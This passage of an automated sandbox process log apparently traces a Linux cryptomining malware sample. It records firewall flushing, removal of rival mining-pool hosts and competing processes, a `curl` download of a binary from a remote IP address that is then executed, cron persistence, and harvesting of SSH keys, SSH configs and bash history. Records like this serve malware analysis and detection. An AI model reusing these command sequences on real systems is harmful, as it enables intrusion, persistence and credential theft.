        • ufw-init New Fork (PID: 3371, Parent: 2733)
        • ip6tables (PID: 3371, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-user-forward
        • ufw-init New Fork (PID: 3375, Parent: 2733)
        • ip6tables (PID: 3375, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-before-forward
        • ufw-init New Fork (PID: 3381, Parent: 2733)
        • ip6tables (PID: 3381, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-before-logging-forward
        • ufw-init New Fork (PID: 3388, Parent: 2733)
        • ip6tables (PID: 3388, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-track-forward
        • ufw-init New Fork (PID: 3398, Parent: 2733)
        • ip6tables (PID: 3398, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-track-output
        • ufw-init New Fork (PID: 3403, Parent: 2733)
        • ip6tables (PID: 3403, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-track-input
        • ufw-init New Fork (PID: 3409, Parent: 2733)
        • ip6tables (PID: 3409, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-skip-to-policy-output
        • ufw-init New Fork (PID: 3414, Parent: 2733)
        • ip6tables (PID: 3414, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-reject-output
        • ufw-init New Fork (PID: 3418, Parent: 2733)
        • ip6tables (PID: 3418, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-after-logging-output
        • ufw-init New Fork (PID: 3423, Parent: 2733)
        • ip6tables (PID: 3423, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-after-output
        • ufw-init New Fork (PID: 3427, Parent: 2733)
        • ip6tables (PID: 3427, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-user-logging-output
        • ufw-init New Fork (PID: 3431, Parent: 2733)
        • ip6tables (PID: 3431, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-user-output
        • ufw-init New Fork (PID: 3435, Parent: 2733)
        • ip6tables (PID: 3435, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-before-output
        • ufw-init New Fork (PID: 3438, Parent: 2733)
        • ip6tables (PID: 3438, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-before-logging-output
        • ufw-init New Fork (PID: 3444, Parent: 2733)
        • ip6tables (PID: 3444, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-logging-deny
        • ufw-init New Fork (PID: 3449, Parent: 2733)
        • ip6tables (PID: 3449, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-logging-allow
        • ufw-init New Fork (PID: 3455, Parent: 2733)
        • ip6tables (PID: 3455, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-not-local
        • ufw-init New Fork (PID: 3461, Parent: 2733)
        • ip6tables (PID: 3461, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-user-logging-input
        • ufw-init New Fork (PID: 3469, Parent: 2733)
        • ip6tables (PID: 3469, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-user-limit-accept
        • ufw-init New Fork (PID: 3477, Parent: 2733)
        • ip6tables (PID: 3477, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-user-limit
        • ufw-init New Fork (PID: 3486, Parent: 2733)
        • ip6tables (PID: 3486, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-skip-to-policy-input
        • ufw-init New Fork (PID: 3491, Parent: 2733)
        • ip6tables (PID: 3491, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-reject-input
        • ufw-init New Fork (PID: 3497, Parent: 2733)
        • ip6tables (PID: 3497, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-after-logging-input
        • ufw-init New Fork (PID: 3502, Parent: 2733)
        • ip6tables (PID: 3502, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-after-input
        • ufw-init New Fork (PID: 3507, Parent: 2733)
        • ip6tables (PID: 3507, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-user-input
        • ufw-init New Fork (PID: 3513, Parent: 2733)
        • ip6tables (PID: 3513, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-before-input
        • ufw-init New Fork (PID: 3521, Parent: 2733)
        • ip6tables (PID: 3521, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-before-logging-input
        • ufw-init New Fork (PID: 3527, Parent: 2733)
        • ip6tables (PID: 3527, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-skip-to-policy-forward
        • ufw-init New Fork (PID: 3532, Parent: 2733)
        • ip6tables (PID: 3532, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-reject-forward
        • ufw-init New Fork (PID: 3539, Parent: 2733)
        • ip6tables (PID: 3539, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-after-logging-forward
        • ufw-init New Fork (PID: 3547, Parent: 2733)
        • ip6tables (PID: 3547, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-after-forward
        • ufw-init New Fork (PID: 3552, Parent: 2733)
        • ip6tables (PID: 3552, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-user-logging-forward
        • ufw-init New Fork (PID: 3557, Parent: 2733)
        • ip6tables (PID: 3557, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-user-forward
        • ufw-init New Fork (PID: 3561, Parent: 2733)
        • ip6tables (PID: 3561, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-before-forward
        • ufw-init New Fork (PID: 3565, Parent: 2733)
        • ip6tables (PID: 3565, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-before-logging-forward
        • ufw-init New Fork (PID: 3569, Parent: 2733)
        • ip6tables (PID: 3569, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-track-forward
        • ufw-init New Fork (PID: 3575, Parent: 2733)
        • ip6tables (PID: 3575, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-track-output
        • ufw-init New Fork (PID: 3580, Parent: 2733)
        • ip6tables (PID: 3580, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-track-input
        • ufw-init New Fork (PID: 3585, Parent: 2733)
        • ip6tables (PID: 3585, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-skip-to-policy-output
        • ufw-init New Fork (PID: 3590, Parent: 2733)
        • ip6tables (PID: 3590, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-reject-output
        • ufw-init New Fork (PID: 3597, Parent: 2733)
        • ip6tables (PID: 3597, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-after-logging-output
        • ufw-init New Fork (PID: 3603, Parent: 2733)
        • ip6tables (PID: 3603, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-after-output
        • ufw-init New Fork (PID: 3608, Parent: 2733)
        • ip6tables (PID: 3608, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-user-logging-output
        • ufw-init New Fork (PID: 3613, Parent: 2733)
        • ip6tables (PID: 3613, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-user-output
        • ufw-init New Fork (PID: 3618, Parent: 2733)
        • ip6tables (PID: 3618, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-before-output
        • ufw-init New Fork (PID: 3625, Parent: 2733)
        • ip6tables (PID: 3625, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -Z ufw6-before-logging-output
        • ufw-init New Fork (PID: 3631, Parent: 2733)
        • ip6tables (PID: 3631, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -X ufw6-logging-deny
        • ufw-init New Fork (PID: 3634, Parent: 2733)
        • ip6tables (PID: 3634, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -X ufw6-logging-allow
        • ufw-init New Fork (PID: 3640, Parent: 2733)
        • ip6tables (PID: 3640, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -X ufw6-not-local
        • ufw-init New Fork (PID: 3647, Parent: 2733)
        • ip6tables (PID: 3647, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -X ufw6-user-logging-input
        • ufw-init New Fork (PID: 3654, Parent: 2733)
        • ip6tables (PID: 3654, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -X ufw6-user-logging-output
        • ufw-init New Fork (PID: 3662, Parent: 2733)
        • ip6tables (PID: 3662, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -X ufw6-user-logging-forward
        • ufw-init New Fork (PID: 3667, Parent: 2733)
        • ip6tables (PID: 3667, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -X ufw6-user-limit-accept
        • ufw-init New Fork (PID: 3675, Parent: 2733)
        • ip6tables (PID: 3675, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -X ufw6-user-limit
        • ufw-init New Fork (PID: 3681, Parent: 2733)
        • ip6tables (PID: 3681, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -X ufw6-user-input
        • ufw-init New Fork (PID: 3687, Parent: 2733)
        • ip6tables (PID: 3687, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -X ufw6-user-forward
        • ufw-init New Fork (PID: 3695, Parent: 2733)
        • ip6tables (PID: 3695, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -X ufw6-user-output
        • ufw-init New Fork (PID: 3703, Parent: 2733)
        • ip6tables (PID: 3703, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -X ufw6-skip-to-policy-input
        • ufw-init New Fork (PID: 3709, Parent: 2733)
        • ip6tables (PID: 3709, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -X ufw6-skip-to-policy-output
        • ufw-init New Fork (PID: 3712, Parent: 2733)
        • ip6tables (PID: 3712, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -X ufw6-skip-to-policy-forward
        • ufw-init New Fork (PID: 3715, Parent: 2733)
        • ip6tables (PID: 3715, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -P INPUT ACCEPT
        • ufw-init New Fork (PID: 3719, Parent: 2733)
        • ip6tables (PID: 3719, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -P OUTPUT ACCEPT
        • ufw-init New Fork (PID: 3723, Parent: 2733)
        • ip6tables (PID: 3723, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -P FORWARD ACCEPT
    • sh New Fork (PID: 3733, Parent: 2676)
    • iptables (PID: 3733, Parent: 2676, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -P INPUT ACCEPT
    • sh New Fork (PID: 3740, Parent: 2676)
    • iptables (PID: 3740, Parent: 2676, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -P OUTPUT ACCEPT
    • sh New Fork (PID: 3744, Parent: 2676)
    • iptables (PID: 3744, Parent: 2676, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -P FORWARD ACCEPT
    • sh New Fork (PID: 3748, Parent: 2676)
    • iptables (PID: 3748, Parent: 2676, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F
    • sh New Fork (PID: 3755, Parent: 2676)
    • chattr (PID: 3755, Parent: 2676, MD5: 8aa970e89963faf71434e3a37222cc49) Arguments: chattr -ia /etc/ld.so.preload
    • sh New Fork (PID: 3765, Parent: 2676)
    • cat (PID: 3765, Parent: 2676, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /dev/null
    • sh New Fork (PID: 3770, Parent: 2676)
    • chattr (PID: 3770, Parent: 2676, MD5: 8aa970e89963faf71434e3a37222cc49) Arguments: chattr -ia /etc/hosts
    • sh New Fork (PID: 3777, Parent: 2676)
    • sed (PID: 3777, Parent: 2676, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -i /f2pool.com\\|nanopool.org\\|minexmr.com\\|supportxmr.com\\|c3pool.com/d /etc/hosts
    • sh New Fork (PID: 3789, Parent: 2676)
      • sh New Fork (PID: 3791, Parent: 3789)
        • sh New Fork (PID: 3793, Parent: 3791)
        • id (PID: 3793, Parent: 3791, MD5: 24007385139205c5b3d116e4efd3253e) Arguments: id -u
      • grep (PID: 3791, Parent: 3789, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep x:0: /etc/passwd
      • sh New Fork (PID: 3792, Parent: 3789)
      • cut (PID: 3792, Parent: 3789, MD5: af0cd4efc9e34a60050e61faac91842d) Arguments: cut -d: -f6
    • sh New Fork (PID: 3805, Parent: 2676)
    • chmod (PID: 3805, Parent: 2676, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod +x /tmp/i
    • sh New Fork (PID: 3812, Parent: 2676)
    • sh (PID: 3812, Parent: 2676, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh ./i
    • sh New Fork (PID: 3821, Parent: 2676)
    • rm (PID: 3821, Parent: 2676, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -f i
    • sh New Fork (PID: 3825, Parent: 2676)
    • mv (PID: 3825, Parent: 2676, MD5: unknown) Arguments: mv /usr/bin/ps.original /usr/bin/ps
    • sh New Fork (PID: 3832, Parent: 2676)
    • crontab (PID: 3832, Parent: 2676, MD5: ff68fd30f0037fd7e9c1fdf5a035f739) Arguments: crontab -l
    • sh New Fork (PID: 3833, Parent: 2676)
    • sed (PID: 3833, Parent: 2676, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed /\\.bashgo\\|pastebin\\|onion\\|bprofr/d
    • sh New Fork (PID: 3834, Parent: 2676)
    • crontab (PID: 3834, Parent: 2676, MD5: ff68fd30f0037fd7e9c1fdf5a035f739) Arguments: crontab -
    • sh New Fork (PID: 3841, Parent: 2676)
    • cat (PID: 3841, Parent: 2676, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /proc/mounts
    • sh New Fork (PID: 3842, Parent: 2676)
    • awk (PID: 3842, Parent: 2676, MD5: 1bb5d753c2edd5bae269563a5ec6d0fe) Arguments: awk "{print $2}"
    • sh New Fork (PID: 3843, Parent: 2676)
    • grep (PID: 3843, Parent: 2676, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -P /proc/\\d+
    • sh New Fork (PID: 3844, Parent: 2676)
    • grep (PID: 3844, Parent: 2676, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -Po \\d+
    • sh New Fork (PID: 3845, Parent: 2676)
    • xargs (PID: 3845, Parent: 2676, MD5: d189c4a6ecfb0ca3f5c869690733dd0c) Arguments: xargs -I % kill -9 %
    • sh New Fork (PID: 3857, Parent: 2676)
    • ps (PID: 3857, Parent: 2676, MD5: 37339e5441057d422e61e8a471505337) Arguments: ps aux
    • sh New Fork (PID: 3858, Parent: 2676)
    • grep (PID: 3858, Parent: 2676, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -v grep
    • sh New Fork (PID: 3859, Parent: 2676)
    • grep (PID: 3859, Parent: 2676, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -E mysqldd|\\./python|javae|zgrab|init\\.sh|monero|xmrig|pnscan|zzh|\\./crun|kdevtmpfsi|kinsing|masscan|sshpass|sshexec|xms|load\\.sh|bashirc|dbused|cnrig|attack|/var/tmp/ip|scan\\.log|dovecat|solr\\.sh|solrd|donate-level|network0[0-1]|srv00[1-9]|srv01[0-2]
    • sh New Fork (PID: 3860, Parent: 2676)
    • awk (PID: 3860, Parent: 2676, MD5: 1bb5d753c2edd5bae269563a5ec6d0fe) Arguments: awk "{print $2}"
    • sh New Fork (PID: 3861, Parent: 2676)
    • xargs (PID: 3861, Parent: 2676, MD5: d189c4a6ecfb0ca3f5c869690733dd0c) Arguments: xargs -I % kill -9 %
    • sh New Fork (PID: 3916, Parent: 2676)
    • sh New Fork (PID: 3920, Parent: 2676)
    • id (PID: 3920, Parent: 2676, MD5: 24007385139205c5b3d116e4efd3253e) Arguments: id -u
    • sh New Fork (PID: 3926, Parent: 2676)
    • systemctl (PID: 3926, Parent: 2676, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl stop bot
    • sh New Fork (PID: 3938, Parent: 2676)
    • apt-get (PID: 3938, Parent: 2676, MD5: c9b39d1d45cf6ac57f725249262b82e4) Arguments: apt-get -y install curl
    • sh New Fork (PID: 3952, Parent: 2676)
    • ps (PID: 3952, Parent: 2676, MD5: 37339e5441057d422e61e8a471505337) Arguments: ps aux
    • sh New Fork (PID: 3953, Parent: 2676)
    • grep (PID: 3953, Parent: 2676, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -i [a]liyun
    • sh New Fork (PID: 4031, Parent: 2676)
    • ps (PID: 4031, Parent: 2676, MD5: 37339e5441057d422e61e8a471505337) Arguments: ps aux
    • sh New Fork (PID: 4032, Parent: 2676)
    • grep (PID: 4032, Parent: 2676, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -i [y]unjing
    • sh New Fork (PID: 4062, Parent: 2676)
    • rm (PID: 4062, Parent: 2676, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf /tmp/28e9b_ldr.sh /tmp/config-err-kcpEqe /tmp/systemd-private-f8f6f10c5826436299e2586b5e397d9f-rtkit-daemon.service-WlCClE /tmp/. /tmp/.. /tmp/.ICE-unix /tmp/.Test-unix /tmp/.X0-lock /tmp/.X11-unix /tmp/.XIM-unix /tmp/.font-unix /tmp/.xfsm-ICE-VBAQE0
    • sh New Fork (PID: 4064, Parent: 2676)
    • ps (PID: 4064, Parent: 2676, MD5: 37339e5441057d422e61e8a471505337) Arguments: ps -fe
    • sh New Fork (PID: 4065, Parent: 2676)
    • grep (PID: 4065, Parent: 2676, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep kthreaddi
    • sh New Fork (PID: 4066, Parent: 2676)
    • grep (PID: 4066, Parent: 2676, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -v grep
    • sh New Fork (PID: 4097, Parent: 2676)
    • uname (PID: 4097, Parent: 2676, MD5: 1078d9dca4e90919f7b2433cae105008) Arguments: uname -m
    • sh New Fork (PID: 4099, Parent: 2676)
    • chattr (PID: 4099, Parent: 2676, MD5: 8aa970e89963faf71434e3a37222cc49) Arguments: chattr -i 8267b26db341
    • sh New Fork (PID: 4103, Parent: 2676)
    • rm (PID: 4103, Parent: 2676, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf 8267b26db341
    • sh New Fork (PID: 4109, Parent: 2676)
    • curl (PID: 4109, Parent: 2676, MD5: 53ea41160209f7801a5d5f07b546a9cd) Arguments: curl -k http://194.145.227.21/sys.x86_64
    • sh New Fork (PID: 4134, Parent: 2676)
    • chmod (PID: 4134, Parent: 2676, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod +x 8267b26db341
    • sh New Fork (PID: 4135, Parent: 2676)
    • nohup (PID: 4135, Parent: 2676, MD5: 3b11bb9dc8a020bb26e3cf5cf1da3cba) Arguments: nohup 8267b26db341
    • 8267b26db341 (PID: 4135, Parent: 2676, MD5: unknown) Arguments: 8267b26db341
      • kthreaddk (PID: 4499, Parent: 4135, MD5: unknown) Arguments: kthreaddk
        • kthreaddk New Fork (PID: 4501, Parent: 4499)
          • sh (PID: 4514, Parent: 4501, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "/sbin/modprobe msr > /dev/null 2>&1"
            • sh New Fork (PID: 4515, Parent: 4514)
            • modprobe (PID: 4515, Parent: 4514, MD5: 3d0e6fb594a9ad9c854ace3e507f86c5) Arguments: /sbin/modprobe msr
      • sh (PID: 4536, Parent: 4135, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "\nchattr -R -ia /var/spool/cron\nchattr -ia /etc/crontab\nchattr -R -ia /var/spool/cron/crontabs\nchattr -R -ia /etc/cron.d"
        • sh New Fork (PID: 4537, Parent: 4536)
        • chattr (PID: 4537, Parent: 4536, MD5: 8aa970e89963faf71434e3a37222cc49) Arguments: chattr -R -ia /var/spool/cron
        • sh New Fork (PID: 4539, Parent: 4536)
        • chattr (PID: 4539, Parent: 4536, MD5: 8aa970e89963faf71434e3a37222cc49) Arguments: chattr -ia /etc/crontab
        • sh New Fork (PID: 4544, Parent: 4536)
        • chattr (PID: 4544, Parent: 4536, MD5: 8aa970e89963faf71434e3a37222cc49) Arguments: chattr -R -ia /var/spool/cron/crontabs
        • sh New Fork (PID: 4548, Parent: 4536)
        • chattr (PID: 4548, Parent: 4536, MD5: 8aa970e89963faf71434e3a37222cc49) Arguments: chattr -R -ia /etc/cron.d
      • sh (PID: 4554, Parent: 4135, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "echo '* * * * * /dev/disk/by-path/ytdgwk' | /usr/bin/crontab -"
        • sh New Fork (PID: 4560, Parent: 4554)
        • sh New Fork (PID: 4561, Parent: 4554)
        • crontab (PID: 4561, Parent: 4554, MD5: ff68fd30f0037fd7e9c1fdf5a035f739) Arguments: /usr/bin/crontab -
      • sh (PID: 4602, Parent: 4135, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "\nchattr -R -ia /var/spool/cron\nchattr -ia /etc/crontab\nchattr -R -ia /var/spool/cron/crontabs\nchattr -R -ia /etc/cron.d"
        • sh New Fork (PID: 4603, Parent: 4602)
        • chattr (PID: 4603, Parent: 4602, MD5: 8aa970e89963faf71434e3a37222cc49) Arguments: chattr -R -ia /var/spool/cron
        • sh New Fork (PID: 4604, Parent: 4602)
        • chattr (PID: 4604, Parent: 4602, MD5: 8aa970e89963faf71434e3a37222cc49) Arguments: chattr -ia /etc/crontab
        • sh New Fork (PID: 4605, Parent: 4602)
        • chattr (PID: 4605, Parent: 4602, MD5: 8aa970e89963faf71434e3a37222cc49) Arguments: chattr -R -ia /var/spool/cron/crontabs
        • sh New Fork (PID: 4608, Parent: 4602)
        • chattr (PID: 4608, Parent: 4602, MD5: 8aa970e89963faf71434e3a37222cc49) Arguments: chattr -R -ia /etc/cron.d
      • sh (PID: 4629, Parent: 4135, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "echo '* * * * * /etc/apparmor.d/tunables/ytdgwk' | /usr/bin/crontab -"
        • sh New Fork (PID: 4631, Parent: 4629)
        • sh New Fork (PID: 4632, Parent: 4629)
        • crontab (PID: 4632, Parent: 4629, MD5: ff68fd30f0037fd7e9c1fdf5a035f739) Arguments: /usr/bin/crontab -
      • sh (PID: 4668, Parent: 4135, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "\nchattr -R -ia /var/spool/cron\nchattr -ia /etc/crontab\nchattr -R -ia /var/spool/cron/crontabs\nchattr -R -ia /etc/cron.d"
        • sh New Fork (PID: 4669, Parent: 4668)
        • chattr (PID: 4669, Parent: 4668, MD5: 8aa970e89963faf71434e3a37222cc49) Arguments: chattr -R -ia /var/spool/cron
        • sh New Fork (PID: 4671, Parent: 4668)
        • chattr (PID: 4671, Parent: 4668, MD5: 8aa970e89963faf71434e3a37222cc49) Arguments: chattr -ia /etc/crontab
        • sh New Fork (PID: 4677, Parent: 4668)
        • chattr (PID: 4677, Parent: 4668, MD5: 8aa970e89963faf71434e3a37222cc49) Arguments: chattr -R -ia /var/spool/cron/crontabs
        • sh New Fork (PID: 4680, Parent: 4668)
        • chattr (PID: 4680, Parent: 4668, MD5: 8aa970e89963faf71434e3a37222cc49) Arguments: chattr -R -ia /etc/cron.d
      • sh (PID: 4688, Parent: 4135, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "echo '* * * * * /etc/apport/crashdb.conf.d/ytdgwk' | /usr/bin/crontab -"
        • sh New Fork (PID: 4692, Parent: 4688)
        • sh New Fork (PID: 4693, Parent: 4688)
        • crontab (PID: 4693, Parent: 4688, MD5: ff68fd30f0037fd7e9c1fdf5a035f739) Arguments: /usr/bin/crontab -
      • sh (PID: 4734, Parent: 4135, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "\nchattr -R -ia /var/spool/cron\nchattr -ia /etc/crontab\nchattr -R -ia /var/spool/cron/crontabs\nchattr -R -ia /etc/cron.d"
        • sh New Fork (PID: 4735, Parent: 4734)
        • chattr (PID: 4735, Parent: 4734, MD5: 8aa970e89963faf71434e3a37222cc49) Arguments: chattr -R -ia /var/spool/cron
        • sh New Fork (PID: 4736, Parent: 4734)
        • chattr (PID: 4736, Parent: 4734, MD5: 8aa970e89963faf71434e3a37222cc49) Arguments: chattr -ia /etc/crontab
        • sh New Fork (PID: 4737, Parent: 4734)
        • chattr (PID: 4737, Parent: 4734, MD5: 8aa970e89963faf71434e3a37222cc49) Arguments: chattr -R -ia /var/spool/cron/crontabs
        • sh New Fork (PID: 4739, Parent: 4734)
        • chattr (PID: 4739, Parent: 4734, MD5: 8aa970e89963faf71434e3a37222cc49) Arguments: chattr -R -ia /etc/cron.d
      • sh (PID: 4743, Parent: 4135, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "echo '* * * * * /dev/shm/ytdgwk' | /usr/bin/crontab -"
        • sh New Fork (PID: 4748, Parent: 4743)
        • sh New Fork (PID: 4749, Parent: 4743)
        • crontab (PID: 4749, Parent: 4743, MD5: ff68fd30f0037fd7e9c1fdf5a035f739) Arguments: /usr/bin/crontab -
    • sh New Fork (PID: 4136, Parent: 2676)
      • sh New Fork (PID: 4137, Parent: 4136)
      • find (PID: 4137, Parent: 4136, MD5: e9b4574b80985a4dc1c451ee3146311d) Arguments: find /home/user/ /root /home -maxdepth 2 -name id_rsa*
      • sh New Fork (PID: 4138, Parent: 4136)
      • grep (PID: 4138, Parent: 4136, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -vw pub
    • sh New Fork (PID: 4176, Parent: 2676)
      • sh New Fork (PID: 4178, Parent: 4176)
      • cat (PID: 4178, Parent: 4176, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /home/user/.ssh/config /home/*/.ssh/config /root/.ssh/config
      • sh New Fork (PID: 4179, Parent: 4176)
      • grep (PID: 4179, Parent: 4176, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep IdentityFile
      • sh New Fork (PID: 4180, Parent: 4176)
      • awk (PID: 4180, Parent: 4176, MD5: 1bb5d753c2edd5bae269563a5ec6d0fe) Arguments: awk -F IdentityFile "{print $2 }"
    • sh New Fork (PID: 4186, Parent: 2676)
      • sh New Fork (PID: 4190, Parent: 4186)
      • find (PID: 4190, Parent: 4186, MD5: e9b4574b80985a4dc1c451ee3146311d) Arguments: find /home/user/ /root /home -maxdepth 3 -name *.pem
      • sh New Fork (PID: 4191, Parent: 4186)
      • uniq (PID: 4191, Parent: 4186, MD5: 7281c3baf4062776958ba17bb9086d23) Arguments: uniq
    • sh New Fork (PID: 4226, Parent: 2676)
      • sh New Fork (PID: 4227, Parent: 4226)
      • cat (PID: 4227, Parent: 4226, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /home/user/.ssh/config /home/*/.ssh/config /root/.ssh/config
      • sh New Fork (PID: 4228, Parent: 4226)
      • grep (PID: 4228, Parent: 4226, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep HostName
      • sh New Fork (PID: 4229, Parent: 4226)
      • awk (PID: 4229, Parent: 4226, MD5: 1bb5d753c2edd5bae269563a5ec6d0fe) Arguments: awk -F HostName "{print $2}"
    • sh New Fork (PID: 4230, Parent: 2676)
      • sh New Fork (PID: 4232, Parent: 4230)
      • cat (PID: 4232, Parent: 4230, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /home/user/.bash_history /home/user/.bash_history /root/.bash_history
      • sh New Fork (PID: 4233, Parent: 4230)
